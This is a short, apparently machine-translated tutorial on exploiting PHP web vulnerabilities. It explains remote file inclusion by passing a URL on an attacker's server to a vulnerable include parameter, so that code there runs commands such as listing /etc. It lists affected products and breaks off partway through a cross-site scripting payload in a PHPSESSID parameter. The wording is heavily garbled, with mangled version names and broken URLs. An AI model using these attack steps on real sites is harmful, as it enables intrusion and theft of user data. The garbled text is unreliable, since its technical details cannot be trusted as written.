From now on network security, everyone is most concerned with the largest web page vulnerability should be ASP. In this regard, Xiaozhu is an expert, I didn't speak. However, in PHP, there is also very serious security. Question, but this article is not much. Here, discuss the relevant vulnerabilities of the PHP page slightly.
I have made a summary of the current PHP vulnerability, which is roughly divided into the following: including file vulnerabilities, script commands, and several types of file leaks, SQL injection vulnerabilities. Of course, some of the universal technology such as cookie spoofing Not discussed here, there are many online information. So, let's analyze how to take advantage of these vulnerabilities!
First, let's discuss the included file vulnerability. This vulnerability should be said to be a PHP. This is because the remote attacker can use these vulnerabilities to execute any of the Web process permission Command. Let's take an example: assume that there is such a code in A.PHP: In this code, $ include is generally a setup A good path, but we can construct a path to the attack by yourself. For example, we are submitted: a.php? Include = http://web/b.php, this web is the space we use to attack, of course B.PHP is also the code we use to attack. We can write in B.php Similar to: passthru ("/ bin / ls / etc"); this can be implemented for some purposes. Attack. (Note: Web server should not perform PHP code, otherwise there is a problem. Related details can see << How to attack the common vulnerabilities in the PHP program >>). In this vulnerability, there are a lot of conditions. For example, PAYPAL Store Front, HotNews, Mambo Open Source, PHPDIG, YABB SE, PHPBB, Invisionboard, Solmetra Spaw Editor, Les Visiteurs, PHPGedView, X-Cart, etc.
Next, let's take a look at the script command to perform a vulnerability. This is because the URI parameter submitted by the user lacks full filtering, submitting data containing malicious HTML code, which can cause the cross-station script attack, which may obtain the sensitive information of the target user. We also give an example: In the PHP Transparent PHP PHP 4.3.1, the index.php page in the following versions of PHPSESSID lacks a full filtering, we can achieve the purpose of the attack by such code: http: // Web / INDEX. PHP? PHPSESSID = ">
